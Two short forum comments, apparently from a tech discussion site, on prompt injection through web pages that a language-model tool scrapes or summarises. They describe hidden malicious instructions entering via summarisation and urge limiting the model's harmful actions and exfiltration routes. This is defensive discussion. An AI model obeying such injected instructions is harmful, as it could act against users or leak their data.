|
|
|
|
|
by in_a_society
920 days ago
|
|
Without removing the functionality as it currently exists, I don't see a way to prevent this attack. Seems like the only real way is to have the user not specify websites to scrape for info but to copy paste that content themselves where they at least stand a greater than zero percent chance of noticing a crafted prompt. |
|
There's no current reliable solution to the threat of extra malicious instructions sneaking in via web page summarization etc, so the key thing is to limit the damage that those instructions can do - which means avoiding exposing harmful actions that the language model can carry out and cutting off exfiltration vectors.